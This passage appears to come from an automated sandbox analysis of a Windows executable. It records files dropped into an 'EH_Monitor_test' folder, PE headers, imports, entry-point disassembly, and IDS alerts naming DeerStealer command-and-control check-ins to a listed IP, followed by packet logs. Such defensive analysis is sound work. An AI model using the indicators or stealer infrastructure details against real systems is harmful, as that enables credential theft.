Process:	C:\Users\user\AppData\Local\Temp\RarSFX0\ManyCam.exe
File Type:	PE32 executable (DLL) (console) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	489984
Entropy (8bit):	6.620025610968628
Encrypted:	false
SSDEEP:	6144:R3KP8f7yYkluOutwm5ZNetC5IlhhMdyFWgQK7x5Iz4JxRRAuUzT/9cl84S683Wbh:R3X5ZNG2yIycw5IGxRwVc6683WbQ4
MD5:	C481103724F456CB422834F633B221D9
SHA1:	4EDD4719E7F48F10A880D06F4FD8C2C2F09EA360
SHA-256:	652E514BE96A6AE38D61628B825B95A3F18189F97551B328D12BD4E0CB67F46F
SHA-512:	4F3F7167EDC693C73E7B50C8E15945C98681777C349926B5D4224A43CF59D5BE098E32191ECCF1DD41F56C4601DC8090DBAF26194C39FA991E366906458B57CA
Malicious:	false
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......$..`..`..`.....I.....b..`........k......g.....p.....a......a.....w.....a..Rich`..........PE..L.....m=...........!................5l............Qm................................................................0.......$...x....P.......................`...K..@................................................................................text............................... ..`.data...,@.......*..................@....rsrc........P......................@..@.reloc...e...`...f..................@..B..m=8...(.m=C...(.m=P.......Z...(.m=f...).m=s...........msvcrt.dll.KERNEL32.dll.NTDLL.DLL.VERSION.dll.ADVAPI32.dll.RPCRT4.dll...................................................................................................................................................................................................................................

C:\Users\user\AppData\Roaming\EH_Monitor_test\highgui099.dll

Download File

Process:	C:\Users\user\AppData\Local\Temp\RarSFX0\ManyCam.exe
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	397312
Entropy (8bit):	6.672405371278951
Encrypted:	false
SSDEEP:	12288:J+7gXTkVRt1dixRtVq2EjMS2E7ETstO/:JlTeRt1dSzd4MSUTsO/
MD5:	A354C42FCB37A50ECAD8DDE250F6119E
SHA1:	0EB4AD5E90D28A4A8553D82CEC53072279AF1961
SHA-256:	89DB6973F4EC5859792BCD8A50CD10DB6B847613F2CEA5ADEF740EEC141673B2
SHA-512:	981C82F6334961C54C80009B14A0C2CD48067BAF6D502560D508BE86F5185374A422609C7FDC9A2CDE9B98A7061EFAB7FD9B1F4F421436A9112833122BC35059
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......r\|..6...6...6......4......;......5....;..n......#...6..........."......7......7......7...Rich6...........PE..L.....YM...........!.........@......y........................................ .......r.............................. K..F....9..........d........................#..`...................................................D............................text............................... ..`.rdata..f...........................@..@.data...0r...`...p...`..............@....rsrc...d...........................@..@.reloc...$.......0..................@..B........................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Roaming\EH_Monitor_test\ith

Download File

Process:	C:\Users\user\AppData\Local\Temp\RarSFX0\ManyCam.exe
File Type:	data
Category:	dropped
Size (bytes):	4092894
Entropy (8bit):	7.950017111810137
Encrypted:	false
SSDEEP:	98304:IuDlh/XIsGMfQ9c0B5KDsldsWAR+HwE0jnr7IEz3daB8:IAhvIgY+OMb+HwEMTx
MD5:	535E6BAA0579A8B19BED5857D49BDD0D
SHA1:	AF5B463561AFD9052575F266868DB19292D0EA6D
SHA-256:	8DAFB1E5373A0CC2CE18D7DBC4A51A127D104B9E7E3B95670F0DB2A9D7952D8F
SHA-512:	5546362378302B254EC2E0FDB31013866AF997C0C7A2420ED98AF1517B707CF36DFCB55830CD1FDB70CAE2EBF5EA999D4E9743BAF821D3BB55511AC8483D5DB8
Malicious:	false
Preview:	.Y.L.J.gL.IQROaeg^UFL.ZTMJ.....FO.K..s.T...hU..a.Aj..........Pn....ui.B...T..lPfV.W.h.s..B..pK...G.iEyM...S..c........`.[.....PNe.C_.t....X..Qh\.ji.ENm.G`j.......jHYTJOY...y..l.\tDV......u.d.[..AXu.....g.`..^t.l.E...O.fDh.K....G.v.I.CN......ja`.DX.......U......XEi..l..]l.q\dxZT`rU.s...gC.s.Qy..uK.j.m.I.[C...DUX.ym..syA....i..gs.v.c.\.....U]._v.HL.wu..By.....pkY..KY.p..r.qBF.....q....H..C..Z.ZyJ...fupy.iy.R.Z.V.h.i......YT.WcL....._..Rw..i...q....p.Ifs.b...JDDTS.iieTnq.U...R..UBXmsL..T..g.......F.l]...j....nk.M.`.w.a...Ys.EJN..NX.lD.r...f.J.N..BZyNMJBhO.AS.Z...x.RbQ.L.j.wh....YV..en..Ydt...h.xX.o..SyI...bw]aAF.O.s...k..LCa...._.LLp..bxq..fef]CB.Y.tfc.ns...Ps.f..aK....YE..N.....\F.K.....rE...J.Jc..nU...yM.J`_L.^..n.^l..Yn....T..[.VJ...b.s.t.........AN.....O.c\.........B...].p.\.....V.E.QBeU...a...V_vOL.[.....nbisu.rR...^STMq]..q.kea..Pe.dg....utPPtF..e.r.a_.a_o.S..k[.h.\lw]Y....re.BGYrZ.ERHc.wU.u\K..GW...y..R..i.eV..F._.^\.Cbmyl..K`q.nK...pJ..^B..T....J.S........V.j.oqkj^^a.JVD..[.Wi.s[T

C:\Users\user\AppData\Roaming\EH_Monitor_test\jlfx

Download File

Process:	C:\Users\user\AppData\Local\Temp\RarSFX0\ManyCam.exe
File Type:	data
Category:	dropped
Size (bytes):	88923
Entropy (8bit):	4.3411591827480684
Encrypted:	false
SSDEEP:	1536:9UqVAygmDacN2Uc8p3PcjPugJ78LqHd6VJHBL+JkV0hL1mTHARcVYUmQNwkOX7xn:GyLDaGpfcD3WLhvHx+KoLETHbmQN4X7N
MD5:	CB4C2B33CC5CC6025B4F3B373CFCBE97
SHA1:	7D73D590AE51CE06021EC2E0DC939D267A79F788
SHA-256:	DAB9A7C4310FAC43CC21B924FE8899071E6884CD142F992C1FBAF5140C998268
SHA-512:	680990A0CFB7E8F8AC4AFD69AD292A03C46995529D62EAC76965297F8CB03D78AD8BB799B149E8E74DC90CC185A0DB53AEDD0DB80C36A8410D14F24C7F2FE9FB
Malicious:	false
Preview:	.s..ETgX....E.....OS.x...M..^qJX.[..qx.OJb.iW.nZ.`T.PU..OT`...pq..s.g.x...^C...s.p...nG.o.bN.x..c...KDO..r..QFYl.iVM..V....O..xI_y...w...B.hH.B.g..U._..P.....L...f...m.y..A.\H.]d...O..y.Y.m..ue^.Xi..L..L..qhKNcN.[VhJjp....m^..^t.hxL......`.EF...gk.ctj.H.s.._UDC....k.led.Kg..fMx..N.nEuo....Fy...U.]...FM..k..[..M.JI\.....m.u...s..j.e..R_.Oc..L..hsB.D..[iT_x.K..WZ..jgc.al.].UPt...........w....wqP.....].....W_tQv..CB..Im.Fd.A.f...X.jS....Qg.VJf.._.AO...i.Y.BIPs.Nm.y..N.bs.xI.d.R.l.rr.u...l...mns....vd.p..vl..Kp.gS\fB.EE.CF.a\o...y....u...j.......[X.f.._.\.w..V...Znl.M...b.ss.M.qF.ghTM.......\.JW..v.v.X.os....qVh.....p..wd.`.S.\nHM.TIEy.H.QVdA.v..ntVuI.he.CptnK..N..mW..I.Y.H.m...V..JM....g.....G......].s_...cO.H..[.c.....B.M...o..Ji...n.^.A...X....S.N.Rx_..oK.Tc._........e.f..OS..M..y.E.WDg.hcNVE.biK.c..Ff.n....a...Ih...f^N.rRAj..IY....LQ\.K.Z._.u.Y.j..`OJ.....G..F]...D.Rh...QW..^.H.....h^NcRI..Y..FMBFt....C.K..L.k.X.jlq...Ds..._\H......Cif.y.R.....u....yLd...p...jho.]G.Hc.AVS...eBe...E..rS

Static File Info

General

File type:	PE32+ executable (GUI) x86-64, for MS Windows
Entropy (8bit):	7.979355385584196
TrID:	Win64 Executable GUI (202006/5) 92.65% Win64 Executable (generic) (12005/4) 5.51% Generic Win/DOS Executable (2004/3) 0.92% DOS Executable Generic (2002/1) 0.92% Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
File name:	file.exe
File size:	5'963'808 bytes
MD5:	b55b503a690229f094ec6c9017145104
SHA1:	1e0ffefdcff18410c5221c96ed17cc42d9d37f85
SHA256:	a7cd1ac259dab063ac93ed0e9dc533bd90d1a2a26d8d0fbec0823bb073747b01
SHA512:	c3e8e73455a769016cb84fd6612245bbb8116f113493ff3bb49dfb30f3405ea0c6f8d73a271adba7988eff11174187057d20917955aaf4cde68877d9b972c7c3
SSDEEP:	98304:ehLAxeIvtESu7pnQoPF+GWREgQqRyCwp6zEp7vQgBBjAf7/gxPeBd+3Q:ehCeR7pQo9nWRBW5vZjE/gxPen
TLSH:	E356330AD3F419E8E173D579CD468905E37A3C160725C68F57B4952A3F233A22B3EB62
File Content Preview:	MZ......................@................................... ...........!..L.!This program cannot be run in DOS mode....$.......t...0..I0..I0..I.'.I8..I.'.I...I.'.I=..I...I2..I...H"..I...H9..I...H...I9.rI9..I9.vI2..I9.bI7..I0..I/..I...H...I...H1..I...I1..

File Icon


Icon Hash:	1515d4d4442f2d2d

Static PE Info

General

Entrypoint:	0x140027180
Entrypoint Section:	.text
Digitally signed:	false
Imagebase:	0x140000000
Subsystem:	windows gui
Image File Characteristics:	EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE
DLL Characteristics:	HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, GUARD_CF, TERMINAL_SERVER_AWARE
Time Stamp:	0x651BC7FA [Tue Oct 3 07:51:22 2023 UTC]
TLS Callbacks:
CLR (.Net) Version:
OS Version Major:	5
OS Version Minor:	2
File Version Major:	5
File Version Minor:	2
Subsystem Version Major:	5
Subsystem Version Minor:	2
Import Hash:	bc758c921c6e0fda5a933c5b8a3c02e9

Entrypoint Preview

Instruction
dec eax
sub esp, 28h
call 00007FA5F8BCE058h
dec eax
add esp, 28h
jmp 00007FA5F8BCDA7Fh
int3
int3
int3
int3
int3
int3
int3
int3
int3
int3
int3
int3
int3
int3
dec eax
sub esp, 48h
dec eax
lea ecx, dword ptr [esp+20h]
call 00007FA5F8BBD80Fh
dec eax
lea edx, dword ptr [0002390Bh]
dec eax
lea ecx, dword ptr [esp+20h]
call 00007FA5F8BCFA0Eh
int3
jmp 00007FA5F8BD2878h
int3
int3
int3
dec eax
mov dword ptr [esp+10h], ebx
dec eax
mov dword ptr [esp+18h], esi
push edi
dec eax
sub esp, 10h
xor eax, eax
xor ecx, ecx
cpuid
inc esp
mov eax, ecx
inc ebp
xor ebx, ebx
inc esp
mov edx, edx
inc ecx
xor eax, 6C65746Eh
inc ecx
xor edx, 49656E69h
inc esp
mov ecx, ebx
mov esi, eax
xor ecx, ecx
inc ecx
lea eax, dword ptr [ebx+01h]
inc ebp
or edx, eax
cpuid
inc ecx
xor ecx, 756E6547h
mov dword ptr [esp], eax
inc ebp
or edx, ecx
mov dword ptr [esp+04h], ebx
mov edi, ecx
mov dword ptr [esp+08h], ecx
mov dword ptr [esp+0Ch], edx
jne 00007FA5F8BCDC5Dh
dec eax
or dword ptr [000267A7h], FFFFFFFFh
and eax, 0FFF3FF0h
dec eax
mov dword ptr [0002678Fh], 00008000h
cmp eax, 000106C0h
je 00007FA5F8BCDC2Ah
cmp eax, 00020660h
je 00007FA5F8BCDC23h

Rich Headers

Programming Language:

[ C ] VS2008 SP1 build 30729
[IMP] VS2008 SP1 build 30729

Data Directories

Name	Virtual Address	Virtual Size	Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT	0x4baf0	0x34	.rdata
IMAGE_DIRECTORY_ENTRY_IMPORT	0x4bb24	0x50	.rdata
IMAGE_DIRECTORY_ENTRY_RESOURCE	0x78000	0xdff8	.rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION	0x73000	0x2bec	.pdata
IMAGE_DIRECTORY_ENTRY_SECURITY	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BASERELOC	0x86000	0x92c	.reloc
IMAGE_DIRECTORY_ENTRY_DEBUG	0x47440	0x54	.rdata
IMAGE_DIRECTORY_ENTRY_COPYRIGHT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_GLOBALPTR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_TLS	0x0	0x0
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG	0x3ef90	0x140	.rdata
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IAT	0x3c000	0x4f8	.rdata
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT	0x4ac3c	0x120	.rdata
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_RESERVED	0x0	0x0

Sections

Name	Virtual Address	Virtual Size	Raw Size	MD5	Xored PE	ZLIB Complexity	File Type	Entropy	Characteristics
.text	0x1000	0x3a16e	0x3a200	018ae3efa0f168660ce7c21c48d504c6	False	0.5690650201612903	data	6.490300148001923	IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
.rdata	0x3c000	0x10bd4	0x10c00	e8d78966c6d767e791c1650623644bce	False	0.4441464552238806	data	5.193786307946991	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.data	0x4d000	0x255fc	0x1600	8d969322e7119d376163fbc531e0e4b8	False	0.3409090909090909	data	3.7728254941028263	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.pdata	0x73000	0x2bec	0x2c00	0dc6037efb8803bcd2b11a9cc88985ea	False	0.49476207386363635	data	5.513737899338275	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.didat	0x76000	0x358	0x400	31dda3d10fbbaa58c793828df356a826	False	0.2548828125	data	3.0050302307669274	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
_RDATA	0x77000	0x15c	0x200	ae270b667108cfd6cc3ba721edc5f3be	False	0.40625	data	3.3376119966247324	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.rsrc	0x78000	0xdff8	0xe000	ccf0575de08010453ea154c5ae2b2f26	False	0.6373116629464286	data	6.638595424147236	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.reloc	0x86000	0x92c	0xa00	fd5fbb5b9d670e1a44502a2fb1e51f45	False	0.51484375	data	5.268524278671299	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

Resources

Name	RVA	Size	Type	Language	Country	ZLIB Complexity
PNG	0x78650	0xb45	PNG image data, 93 x 302, 8-bit/color RGB, non-interlaced	English	United States	1.0027729636048528
PNG	0x79198	0x15a9	PNG image data, 186 x 604, 8-bit/color RGB, non-interlaced	English	United States	0.9363390441839495
RT_ICON	0x7a748	0x568	Device independent bitmap graphic, 16 x 32 x 8, image size 256, resolution 2834 x 2834 px/m, 256 important colors	English	United States	0.47832369942196534
RT_ICON	0x7acb0	0x8a8	Device independent bitmap graphic, 32 x 64 x 8, image size 1024, resolution 2834 x 2834 px/m, 256 important colors	English	United States	0.5410649819494585
RT_ICON	0x7b558	0xea8	Device independent bitmap graphic, 48 x 96 x 8, image size 2304, resolution 2834 x 2834 px/m, 256 important colors	English	United States	0.4933368869936034
RT_ICON	0x7c400	0x468	Device independent bitmap graphic, 16 x 32 x 32, image size 1024, resolution 2834 x 2834 px/m	English	United States	0.5390070921985816
RT_ICON	0x7c868	0x10a8	Device independent bitmap graphic, 32 x 64 x 32, image size 4096, resolution 2834 x 2834 px/m	English	United States	0.41393058161350843
RT_ICON	0x7d910	0x25a8	Device independent bitmap graphic, 48 x 96 x 32, image size 9216, resolution 2834 x 2834 px/m	English	United States	0.3479253112033195
RT_ICON	0x7feb8	0x3d71	PNG image data, 256 x 256, 8-bit/color RGBA, non-interlaced	English	United States	0.9809269502193401
RT_DIALOG	0x84588	0x286	data	English	United States	0.5092879256965944
RT_DIALOG	0x84358	0x13a	data	English	United States	0.60828025477707
RT_DIALOG	0x84498	0xec	data	English	United States	0.6991525423728814
RT_DIALOG	0x84228	0x12e	data	English	United States	0.5927152317880795
RT_DIALOG	0x83ef0	0x338	data	English	United States	0.45145631067961167
RT_DIALOG	0x83c98	0x252	data	English	United States	0.5757575757575758
RT_STRING	0x84f68	0x1e2	data	English	United States	0.3900414937759336
RT_STRING	0x85150	0x1cc	data	English	United States	0.4282608695652174
RT_STRING	0x85320	0x1b8	data	English	United States	0.45681818181818185
RT_STRING	0x854d8	0x146	data	English	United States	0.5153374233128835
RT_STRING	0x85620	0x46c	data	English	United States	0.3454063604240283
RT_STRING	0x85a90	0x166	data	English	United States	0.49162011173184356
RT_STRING	0x85bf8	0x152	data	English	United States	0.5059171597633136
RT_STRING	0x85d50	0x10a	data	English	United States	0.49624060150375937
RT_STRING	0x85e60	0xbc	data	English	United States	0.6329787234042553
RT_STRING	0x85f20	0xd6	data	English	United States	0.5747663551401869
RT_GROUP_ICON	0x83c30	0x68	data	English	United States	0.7019230769230769
RT_MANIFEST	0x84810	0x753	XML 1.0 document, ASCII text, with CRLF line terminators	English	United States	0.3957333333333333

Imports

DLL	Import
KERNEL32.dll	GetLastError, SetLastError, FormatMessageW, GetCurrentProcess, DeviceIoControl, SetFileTime, CloseHandle, CreateDirectoryW, RemoveDirectoryW, CreateFileW, DeleteFileW, CreateHardLinkW, GetShortPathNameW, GetLongPathNameW, MoveFileW, GetFileType, GetStdHandle, WriteFile, ReadFile, FlushFileBuffers, SetEndOfFile, SetFilePointer, GetCurrentProcessId, SetFileAttributesW, GetFileAttributesW, FindClose, FindFirstFileW, FindNextFileW, GetVersionExW, GetCurrentDirectoryW, GetFullPathNameW, FoldStringW, GetModuleFileNameW, GetModuleHandleW, FindResourceW, FreeLibrary, GetProcAddress, ExitProcess, SetThreadExecutionState, Sleep, LoadLibraryW, GetSystemDirectoryW, CompareStringW, AllocConsole, FreeConsole, AttachConsole, WriteConsoleW, GetProcessAffinityMask, CreateThread, SetThreadPriority, InitializeCriticalSection, EnterCriticalSection, LeaveCriticalSection, DeleteCriticalSection, SetEvent, ResetEvent, ReleaseSemaphore, WaitForSingleObject, CreateEventW, CreateSemaphoreW, GetSystemTime, SystemTimeToTzSpecificLocalTime, TzSpecificLocalTimeToSystemTime, SystemTimeToFileTime, FileTimeToLocalFileTime, LocalFileTimeToFileTime, FileTimeToSystemTime, GetCPInfo, IsDBCSLeadByte, MultiByteToWideChar, WideCharToMultiByte, GlobalAlloc, LockResource, GlobalLock, GlobalUnlock, GlobalFree, LoadResource, SizeofResource, SetCurrentDirectoryW, GetTimeFormatW, GetDateFormatW, LocalFree, GetExitCodeProcess, GetLocalTime, GetTickCount, MapViewOfFile, UnmapViewOfFile, CreateFileMappingW, OpenFileMappingW, GetCommandLineW, SetEnvironmentVariableW, ExpandEnvironmentStringsW, GetTempPathW, MoveFileExW, GetLocaleInfoW, GetNumberFormatW, SetFilePointerEx, GetConsoleMode, GetConsoleCP, HeapSize, SetStdHandle, GetProcessHeap, FreeEnvironmentStringsW, GetEnvironmentStringsW, GetCommandLineA, GetOEMCP, IsValidCodePage, RaiseException, GetSystemInfo, VirtualProtect, VirtualQuery, LoadLibraryExA, RtlCaptureContext, RtlLookupFunctionEntry, RtlVirtualUnwind, UnhandledExceptionFilter, SetUnhandledExceptionFilter, TerminateProcess, IsProcessorFeaturePresent, IsDebuggerPresent, GetStartupInfoW, QueryPerformanceCounter, GetCurrentThreadId, GetSystemTimeAsFileTime, InitializeSListHead, RtlUnwindEx, RtlPcToFileHeader, EncodePointer, InitializeCriticalSectionAndSpinCount, TlsAlloc, TlsGetValue, TlsSetValue, TlsFree, LoadLibraryExW, QueryPerformanceFrequency, GetModuleHandleExW, GetModuleFileNameA, GetACP, HeapFree, HeapReAlloc, HeapAlloc, GetStringTypeW, LCMapStringW, FindFirstFileExA, FindNextFileA
OLEAUT32.dll	SysAllocString, SysFreeString, VariantClear
gdiplus.dll	GdipCloneImage, GdipFree, GdipDisposeImage, GdipCreateBitmapFromStream, GdipCreateHBITMAPFromBitmap, GdiplusStartup, GdiplusShutdown, GdipAlloc

Possible Origin

Language of compilation system	Country where language is spoken	Map
English	United States

Network Behavior

Suricata IDS Alerts

Timestamp	SID	Signature	Severity	Source IP	Source Port	Dest IP	Dest Port	Protocol
2024-10-19T19:53:58.549994+0200	2056550	ET MALWARE Win32/DeerStealer CnC Checkin	1	192.168.2.4	49741	188.114.97.3	443	TCP
2024-10-19T19:54:36.337584+0200	2056550	ET MALWARE Win32/DeerStealer CnC Checkin	1	192.168.2.4	49946	188.114.97.3	443	TCP

Network Port Distribution

TCP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Oct 19, 2024 19:53:57.439439058 CEST	49741	443	192.168.2.4	188.114.97.3
Oct 19, 2024 19:53:57.439528942 CEST	443	49741	188.114.97.3	192.168.2.4
Oct 19, 2024 19:53:57.439604998 CEST	49741	443	192.168.2.4	188.114.97.3
Oct 19, 2024 19:53:57.440473080 CEST	49741	443	192.168.2.4	188.114.97.3
Oct 19, 2024 19:53:57.440512896 CEST	443	49741	188.114.97.3	192.168.2.4
Oct 19, 2024 19:53:58.071639061 CEST	443	49741	188.114.97.3	192.168.2.4
Oct 19, 2024 19:53:58.071748972 CEST	49741	443	192.168.2.4	188.114.97.3
Oct 19, 2024 19:53:58.073194981 CEST	49741	443	192.168.2.4	188.114.97.3
Oct 19, 2024 19:53:58.073224068 CEST	443	49741	188.114.97.3	192.168.2.4
Oct 19, 2024 19:53:58.073565960 CEST	443	49741	188.114.97.3	192.168.2.4
Oct 19, 2024 19:53:58.115365028 CEST	49741	443	192.168.2.4	188.114.97.3
Oct 19, 2024 19:53:58.115542889 CEST	49741	443	192.168.2.4	188.114.97.3
Oct 19, 2024 19:53:58.115585089 CEST	49741	443	192.168.2.4	188.114.97.3
Oct 19, 2024 19:53:58.115806103 CEST	443	49741	188.114.97.3	192.168.2.4
Oct 19, 2024 19:53:58.549992085 CEST	443	49741	188.114.97.3	192.168.2.4
Oct 19, 2024 19:53:58.550643921 CEST	443	49741	188.114.97.3	192.168.2.4
Oct 19, 2024 19:53:58.550689936 CEST	443	49741	188.114.97.3	192.168.2.4
Oct 19, 2024 19:53:58.550734043 CEST	49741	443	192.168.2.4	188.114.97.3
Oct 19, 2024 19:53:58.550795078 CEST	443	49741	188.114.97.3	192.168.2.4
Oct 19, 2024 19:53:58.550848007 CEST	49741	443	192.168.2.4	188.114.97.3
Oct 19, 2024 19:53:58.551703930 CEST	443	49741	188.114.97.3	192.168.2.4
Oct 19, 2024 19:53:58.552411079 CEST	443	49741	188.114.97.3	192.168.2.4
Oct 19, 2024 19:53:58.552468061 CEST	49741	443	192.168.2.4	188.114.97.3
Oct 19, 2024 19:53:58.552484989 CEST	443	49741	188.114.97.3	192.168.2.4
Oct 19, 2024 19:53:58.553570032 CEST	443	49741	188.114.97.3	192.168.2.4
Oct 19, 2024 19:53:58.554805040 CEST	443	49741	188.114.97.3	192.168.2.4
Oct 19, 2024 19:53:58.554856062 CEST	49741	443	192.168.2.4	188.114.97.3
Oct 19, 2024 19:53:58.554872036 CEST	443	49741	188.114.97.3	192.168.2.4
Oct 19, 2024 19:53:58.554924965 CEST	49741	443	192.168.2.4	188.114.97.3
Oct 19, 2024 19:53:58.557200909 CEST	443	49741	188.114.97.3	192.168.2.4
Oct 19, 2024 19:53:58.599714041 CEST	49741	443	192.168.2.4	188.114.97.3
Oct 19, 2024 19:53:58.669692993 CEST	443	49741	188.114.97.3	192.168.2.4
Oct 19, 2024 19:53:58.669861078 CEST	443	49741	188.114.97.3	192.168.2.4
Oct 19, 2024 19:53:58.669991016 CEST	49741	443	192.168.2.4	188.114.97.3
Oct 19, 2024 19:53:58.670013905 CEST	443	49741	188.114.97.3	192.168.2.4
Oct 19, 2024 19:53:58.670299053 CEST	443	49741	188.114.97.3	192.168.2.4
Oct 19, 2024 19:53:58.671435118 CEST	443	49741	188.114.97.3	192.168.2.4
Oct 19, 2024 19:53:58.671494961 CEST	49741	443	192.168.2.4	188.114.97.3
Oct 19, 2024 19:53:58.671511889 CEST	443	49741	188.114.97.3	192.168.2.4
Oct 19, 2024 19:53:58.671564102 CEST	49741	443	192.168.2.4	188.114.97.3
Oct 19, 2024 19:53:58.671576023 CEST	443	49741	188.114.97.3	192.168.2.4
Oct 19, 2024 19:53:58.673820972 CEST	443	49741	188.114.97.3	192.168.2.4
Oct 19, 2024 19:53:58.673907995 CEST	443	49741	188.114.97.3	192.168.2.4
Oct 19, 2024 19:53:58.673963070 CEST	49741	443	192.168.2.4	188.114.97.3
Oct 19, 2024 19:53:58.673979044 CEST	443	49741	188.114.97.3	192.168.2.4
Oct 19, 2024 19:53:58.674032927 CEST	49741	443	192.168.2.4	188.114.97.3
Oct 19, 2024 19:53:58.674045086 CEST	443	49741	188.114.97.3	192.168.2.4
Oct 19, 2024 19:53:58.724693060 CEST	49741	443	192.168.2.4	188.114.97.3
Oct 19, 2024 19:53:58.790066957 CEST	443	49741	188.114.97.3	192.168.2.4
Oct 19, 2024 19:53:58.790934086 CEST	443	49741	188.114.97.3	192.168.2.4
Oct 19, 2024 19:53:58.791693926 CEST	443	49741	188.114.97.3	192.168.2.4
Oct 19, 2024 19:53:58.791800022 CEST	49741	443	192.168.2.4	188.114.97.3
Oct 19, 2024 19:53:58.791870117 CEST	443	49741	188.114.97.3	192.168.2.4
Oct 19, 2024 19:53:58.791938066 CEST	49741	443	192.168.2.4	188.114.97.3
Oct 19, 2024 19:53:58.792897940 CEST	443	49741	188.114.97.3	192.168.2.4
Oct 19, 2024 19:53:58.793793917 CEST	443	49741	188.114.97.3	192.168.2.4
Oct 19, 2024 19:53:58.793867111 CEST	443	49741	188.114.97.3	192.168.2.4
Oct 19, 2024 19:53:58.793941021 CEST	49741	443	192.168.2.4	188.114.97.3
Oct 19, 2024 19:53:58.793958902 CEST	443	49741	188.114.97.3	192.168.2.4
Oct 19, 2024 19:53:58.794019938 CEST	49741	443	192.168.2.4	188.114.97.3
Oct 19, 2024 19:53:58.794936895 CEST	443	49741	188.114.97.3	192.168.2.4
Oct 19, 2024 19:53:58.795228004 CEST	443	49741	188.114.97.3	192.168.2.4
Oct 19, 2024 19:53:58.796483040 CEST	49741	443	192.168.2.4	188.114.97.3
Oct 19, 2024 19:53:58.796541929 CEST	49741	443	192.168.2.4	188.114.97.3
Oct 19, 2024 19:53:58.796577930 CEST	443	49741	188.114.97.3	192.168.2.4
Oct 19, 2024 19:53:58.796602964 CEST	49741	443	192.168.2.4	188.114.97.3
Oct 19, 2024 19:53:58.796617031 CEST	443	49741	188.114.97.3	192.168.2.4
Oct 19, 2024 19:53:59.126318932 CEST	49747	443	192.168.2.4	188.114.97.3
Oct 19, 2024 19:53:59.126349926 CEST	443	49747	188.114.97.3	192.168.2.4
Oct 19, 2024 19:53:59.126418114 CEST	49747	443	192.168.2.4	188.114.97.3
Oct 19, 2024 19:53:59.126662016 CEST	49747	443	192.168.2.4	188.114.97.3
Oct 19, 2024 19:53:59.126687050 CEST	443	49747	188.114.97.3	192.168.2.4
Oct 19, 2024 19:53:59.736906052 CEST	443	49747	188.114.97.3	192.168.2.4
Oct 19, 2024 19:53:59.736999989 CEST	49747	443	192.168.2.4	188.114.97.3
Oct 19, 2024 19:53:59.738171101 CEST	49747	443	192.168.2.4	188.114.97.3
Oct 19, 2024 19:53:59.738192081 CEST	443	49747	188.114.97.3	192.168.2.4
Oct 19, 2024 19:53:59.738405943 CEST	443	49747	188.114.97.3	192.168.2.4
Oct 19, 2024 19:53:59.739120007 CEST	49747	443	192.168.2.4	188.114.97.3
Oct 19, 2024 19:53:59.739156008 CEST	49747	443	192.168.2.4	188.114.97.3
Oct 19, 2024 19:53:59.739166975 CEST	443	49747	188.114.97.3	192.168.2.4
Oct 19, 2024 19:54:00.130415916 CEST	443	49747	188.114.97.3	192.168.2.4
Oct 19, 2024 19:54:00.130450964 CEST	443	49747	188.114.97.3	192.168.2.4
Oct 19, 2024 19:54:00.130517960 CEST	49747	443	192.168.2.4	188.114.97.3
Oct 19, 2024 19:54:00.130584955 CEST	49747	443	192.168.2.4	188.114.97.3
Oct 19, 2024 19:54:00.130605936 CEST	443	49747	188.114.97.3	192.168.2.4
Oct 19, 2024 19:54:00.130630016 CEST	49747	443	192.168.2.4	188.114.97.3
Oct 19, 2024 19:54:00.130641937 CEST	443	49747	188.114.97.3	192.168.2.4
Oct 19, 2024 19:54:01.574353933 CEST	49758	443	192.168.2.4	188.114.97.3
Oct 19, 2024 19:54:01.574413061 CEST	443	49758	188.114.97.3	192.168.2.4
Oct 19, 2024 19:54:01.576286077 CEST	49758	443	192.168.2.4	188.114.97.3
Oct 19, 2024 19:54:01.576603889 CEST	49758	443	192.168.2.4	188.114.97.3
Oct 19, 2024 19:54:01.576634884 CEST	443	49758	188.114.97.3	192.168.2.4
Oct 19, 2024 19:54:02.188788891 CEST	443	49758	188.114.97.3	192.168.2.4
Oct 19, 2024 19:54:02.188880920 CEST	49758	443	192.168.2.4	188.114.97.3
Oct 19, 2024 19:54:02.190042973 CEST	49758	443	192.168.2.4	188.114.97.3
Oct 19, 2024 19:54:02.190066099 CEST	443	49758	188.114.97.3	192.168.2.4
Oct 19, 2024 19:54:02.190311909 CEST	443	49758	188.114.97.3	192.168.2.4
Oct 19, 2024 19:54:02.190975904 CEST	49758	443	192.168.2.4	188.114.97.3
Oct 19, 2024 19:54:02.191076040 CEST	49758	443	192.168.2.4	188.114.97.3
Oct 19, 2024 19:54:02.191117048 CEST	443	49758	188.114.97.3	192.168.2.4
Oct 19, 2024 19:54:02.191220045 CEST	49758	443	192.168.2.4	188.114.97.3
